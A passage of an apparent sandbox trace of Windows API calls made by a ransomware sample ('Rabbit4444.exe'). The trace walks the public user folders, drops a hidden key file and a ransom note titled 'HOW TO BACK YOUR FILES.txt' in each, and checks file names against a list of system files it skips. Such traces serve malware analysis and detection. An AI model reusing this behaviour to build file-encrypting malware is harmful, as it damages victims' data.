dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0047.927] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0047.927] lstrcpyW (in: lpString1=0x130eb58, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.927] CreateFileW (lpFileName="C:\\Users\\Public\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.927] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.927] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.928] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.928] CloseHandle (hObject=0x278) returned 1 [0047.928] CloseHandle (hObject=0x27c) returned 1 [0047.929] GetCurrentThreadId () returned 0xd98 [0047.929] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0047.929] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Videos", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0047.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf74f8 | out: hHeap=0xe0000) returned 1 [0047.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0047.929] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0047.929] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0047.929] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3" [0047.929] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\videos\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.930] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.932] FlushFileBuffers (hFile=0x27c) returned 1 [0047.933] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.934] CloseHandle (hObject=0x27c) returned 1 [0047.934] lstrlenW (lpString="C:\\Users\\Public\\Videos") returned 22 [0047.934] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.934] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5e3ec97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0047.934] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.934] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.934] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.934] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.935] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5e3ec97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.935] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.935] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.935] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.935] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.935] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.935] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5e3ec97, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5e3ec97, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5e3ec97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.935] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.935] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.935] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.935] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.935] lstrcpyW (in: lpString1=0x130eb66, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.935] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.936] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.936] lstrlenW (lpString="desktop.ini") returned 11 [0047.936] lstrlenW (lpString="Rabbit4444") returned 10 [0047.936] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.936] lstrlenW (lpString=".dll") returned 4 [0047.936] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.936] lstrlenW (lpString=".lnk") returned 4 [0047.936] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.936] lstrlenW (lpString=".ini") returned 4 [0047.936] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.936] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0047.936] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0047.936] lstrcpyW (in: lpString1=0x130eb66, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.936] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\videos\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.937] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.937] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.937] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.938] CloseHandle (hObject=0x278) returned 1 [0047.938] CloseHandle (hObject=0x27c) returned 1 [0047.938] GetCurrentThreadId () returned 0xd98 [0047.938] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0047.938] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0047.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102a90 | out: hHeap=0xe0000) returned 1 [0047.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0047.939] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0047.939] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0047.939] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3" [0047.939] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.939] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.942] FlushFileBuffers (hFile=0x27c) returned 1 [0047.943] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.943] CloseHandle (hObject=0x27c) returned 1 [0047.944] lstrlenW (lpString="C:\\Users\\Public\\Pictures") returned 24 [0047.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.944] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5e64e97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0047.944] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.944] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.944] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.944] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.944] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5e64e97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.944] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.944] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.944] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.944] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.944] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.945] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5e64e97, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5e64e97, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5e64e97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.945] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.945] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.945] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.945] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.945] lstrcpyW (in: lpString1=0x130eb6a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.945] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.945] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.946] lstrlenW (lpString="desktop.ini") returned 11 [0047.946] lstrlenW (lpString="Rabbit4444") returned 10 [0047.946] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.946] lstrlenW (lpString=".dll") returned 4 [0047.946] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.946] lstrlenW (lpString=".lnk") returned 4 [0047.946] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.946] lstrlenW (lpString=".ini") returned 4 [0047.946] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.946] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0047.946] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0047.946] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.946] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.946] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.946] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.946] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.947] CloseHandle (hObject=0x278) returned 1 [0047.947] CloseHandle (hObject=0x27c) returned 1 [0047.947] GetCurrentThreadId () returned 0xd98 [0047.948] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0047.948] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Music", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0047.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf7bc0 | out: hHeap=0xe0000) returned 1 [0047.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0047.948] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0047.948] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0047.948] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3" [0047.948] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\music\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.949] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.951] FlushFileBuffers (hFile=0x27c) returned 1 [0047.952] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.952] CloseHandle (hObject=0x27c) returned 1 [0047.953] lstrlenW (lpString="C:\\Users\\Public\\Music") returned 21 [0047.953] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.953] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5e64e97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0047.953] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.953] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.953] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.953] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.953] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5e64e97, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.953] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.953] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.953] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.953] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.953] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.953] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5e64e97, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5e64e97, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5e8b15e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.953] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.953] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.953] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.953] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.953] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.953] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.953] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.953] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.953] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.954] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.954] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.954] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.954] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.954] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.954] lstrcpyW (in: lpString1=0x130eb64, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.954] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.954] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.954] lstrlenW (lpString="desktop.ini") returned 11 [0047.954] lstrlenW (lpString="Rabbit4444") returned 10 [0047.954] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.954] lstrlenW (lpString=".dll") returned 4 [0047.954] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.954] lstrlenW (lpString=".lnk") returned 4 [0047.954] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.954] lstrlenW (lpString=".ini") returned 4 [0047.954] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.954] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0047.955] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0047.955] lstrcpyW (in: lpString1=0x130eb64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR 